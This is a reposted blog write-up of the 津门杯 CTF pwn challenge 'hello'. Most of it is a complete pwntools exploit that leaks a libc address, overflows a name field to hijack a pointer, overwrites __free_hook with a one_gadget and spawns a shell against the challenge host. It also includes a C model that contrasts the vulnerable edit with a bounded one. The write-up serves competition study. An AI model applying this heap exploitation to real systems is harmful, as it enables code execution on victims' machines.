I'm 醉熏薯片, a blogger at 靠谱客. This post is about the 津门杯 pwn challenge "hello"; I'm sharing it here as a reference.

Contents

  • hello

Heh, posting this one on its own to mark the occasion: the first time I've solved a pwn challenge in a domestic competition (23/59).

hello

The exploit script (Python 2 + pwntools). The backslashes in the byte escapes (`\x00`) were lost when the page was scraped and are restored here; the gdb breakpoint helper is also fixed so that it actually produces a `b *$rebase(0xc32)` command.

```python
#!/usr/bin/env python2
# coding=utf-8
from pwn import *

arch = "amd64"
filename = "hello"
context(os="linux", arch=arch, log_level="debug")
content = 0   # 0 = run the local binary, anything else = connect to the remote
offset = 0

# elf
elf = ELF(filename)
free_got = elf.got['free']

# libc (the offsets below are for the Ubuntu 16.04 glibc 2.23 used by the challenge)
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
# one_gadget offsets for that libc
ogg_libc = [0x45226, 0x4527a, 0xf0364, 0xf1207]


def add(num, name, size, info):
    io.recvuntil("your choice>>")
    io.sendline("1")
    io.recvuntil("phone number:")
    io.sendline(num)
    io.recvuntil("name:")
    io.sendline(name)
    io.recvuntil("input des size:")
    io.sendline(str(size))
    io.recvuntil("des info:")
    io.sendline(info)


def free(idx):
    io.recvuntil("your choice>>")
    io.sendline("2")
    io.recvuntil("input index:")
    io.sendline(str(idx))


def show(idx):
    io.recvuntil("your choice>>")
    io.sendline("3")
    io.recvuntil("input index:")
    io.sendline(str(idx))


def edit(idx, num, name, info):
    io.recvuntil("your choice>>")
    io.sendline("4")
    io.recvuntil("input index:")
    io.sendline(str(idx))
    io.recvuntil("phone number:")
    io.sendline(num)
    io.recvuntil("name:")
    io.sendline(name)
    io.recvuntil("des info:")
    io.sendline(info)


def b(addr):
    # $rebase() is provided by pwndbg; addr is an offset inside the PIE binary
    bk = "b *$rebase(%s)" % hex(addr)
    gdb.attach(io, bk)
    success("attach")


def main():
    global io
    if content == 0:
        io = process("./" + filename)
    else:
        io = remote("119.3.81.43", 49153)

    num = b'aaaa'
    name = b'b' * (8 + 5)
    info = b'cccc'
    add(num, b'cccc', 0x60, info)           # idx 0
    add(num, name, 0x70, b'/bin/sh\x00')    # idx 1, freed at the end to trigger the hook
    add(num, name, 0x80, info)              # idx 2
    add(num, name, 0x80, info)              # idx 3
    edit(3, num, name, info)
    free(2)
    b(0x0000000000000C32)
    show(3)
    io.recvuntil("des:")
    # leaked unsorted-bin fd = &main_arena + 88; on glibc 2.23 main_arena
    # starts 0x10 past __malloc_hook
    malloc_hook = u64(io.recv(6).ljust(8, b'\x00')) - 88 - 0x10
    ###count####
    libcbase = malloc_hook - libc.symbols['__malloc_hook']
    ogg_addr = libcbase + ogg_libc[1]
    sys_addr = libcbase + libc.symbols['system']
    free_hook = libcbase + libc.symbols['__free_hook']
    print("libcbase:", hex(libcbase))
    #######

    #name = b'b' * (8 + 5) + b'\x00' * 18
    #edit(0, num, name, info)
    # the name field overflows into entry 0's des pointer: point it at __free_hook
    name = b'b' * (8 + 5) + p64(free_hook)
    edit(0, num, name, info)
    # the des info is now written through that pointer: __free_hook = one_gadget
    info = p64(ogg_addr)
    edit(0, num, name, info)
    free(1)   # free() -> __free_hook -> one_gadget
    #b(0x0000000000000C32)
    io.interactive()


main()
```
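The last two `edit(0, ...)` calls in the script are the whole write primitive: a name longer than the field overwrites the entry's `des` pointer, and the next "des info" write then lands wherever that pointer points. The C below is an added example that models that primitive and is not the challenge binary's code: the record layout (a 13-byte name, the `8 + 5` from the script, immediately followed by the 8-byte `des` pointer) is an assumption, `fake_free_hook` stands in for `__free_hook`, and the one_gadget value is a constructed constant. `edit_vuln` copies the name without a bound, `edit_safe` is the bounded version that rejects the same payload.

```c
/* Added example: a model of the name-overflow -> pointer-hijack -> arbitrary
 * write primitive used by the exploit script. Layout is ASSUMED, not taken
 * from the challenge binary. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NAME_LEN 13                          /* assumed: 8 + 5, as in the script */
#define REC_SIZE (NAME_LEN + sizeof(char *)) /* name followed directly by des ptr */

/* One contact record, kept as raw bytes so the offsets are explicit:
 *   raw[0 .. 12]  name
 *   raw[13 .. 20] char *des (pointer to the description buffer)        */
typedef struct { unsigned char raw[REC_SIZE]; } record;

/* Stand-in for the hook the real exploit targets (__free_hook). */
uint64_t fake_free_hook = 0;

static char *get_des(const record *r) {
    char *p;
    memcpy(&p, r->raw + NAME_LEN, sizeof p);
    return p;
}

static void set_des(record *r, char *p) {
    memcpy(r->raw + NAME_LEN, &p, sizeof p);
}

/* Vulnerable edit: the name is copied for its full length, so bytes 13..20
 * of the input replace the des pointer, and the info write goes through it. */
static void edit_vuln(record *r, const unsigned char *name, size_t name_len,
                      const void *info, size_t info_len) {
    memcpy(r->raw, name, name_len);      /* no bound: spills onto des */
    memcpy(get_des(r), info, info_len);  /* arbitrary write once des is hijacked */
}

/* Bounded edit: name must fit the field and info must fit the des buffer. */
static int edit_safe(record *r, const unsigned char *name, size_t name_len,
                     const void *info, size_t info_len, size_t des_cap) {
    if (name_len > NAME_LEN || info_len > des_cap)
        return -1;
    memcpy(r->raw, name, name_len);
    memcpy(get_des(r), info, info_len);
    return 0;
}

/* Replays the script's two edit(0, ...) calls against the model and returns
 * what ended up in the fake hook: the one_gadget value if the write landed,
 * 0 if the bounded edit rejected the payload. */
uint64_t demo_hijack(int hardened) {
    record r;
    char des_buf[0x60];                       /* the entry's legitimate des buffer */
    memset(&r, 'b', NAME_LEN);
    set_des(&r, des_buf);
    fake_free_hook = 0;

    /* payload name = b'b' * 13 + p64(&hook), exactly like the script */
    unsigned char name[REC_SIZE];
    memset(name, 'b', NAME_LEN);
    uint64_t target = (uint64_t)(uintptr_t)&fake_free_hook;
    memcpy(name + NAME_LEN, &target, sizeof target);   /* little-endian, as p64 */

    const char info1[] = "cccc";                          /* first edit's info */
    uint64_t one_gadget = 0xdeadbeefcafe4527ULL;          /* constructed stand-in */

    if (hardened) {
        edit_safe(&r, name, sizeof name, info1, sizeof info1 - 1, sizeof des_buf);
        edit_safe(&r, name, sizeof name, &one_gadget, sizeof one_gadget, sizeof des_buf);
    } else {
        edit_vuln(&r, name, sizeof name, info1, sizeof info1 - 1);  /* des := &hook */
        edit_vuln(&r, name, sizeof name, &one_gadget, sizeof one_gadget); /* *hook := gadget */
    }
    return fake_free_hook;
}

int main(void) {
    printf("unbounded edit: hook = 0x%llx\n", (unsigned long long)demo_hijack(0));
    printf("bounded edit:   hook = 0x%llx\n", (unsigned long long)demo_hijack(1));
    return 0;
}
```

The first vulnerable edit writes `cccc` through the freshly hijacked pointer, which is why the script can afford to send a throwaway `info` on that call; only the second edit needs the real payload. The bounded variant rejects the 21-byte name outright, so the pointer is never touched and the hook stays at 0.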


This content was contributed by a reader or collected from the web, is provided for study and reference only, and remains the copyright of its original author.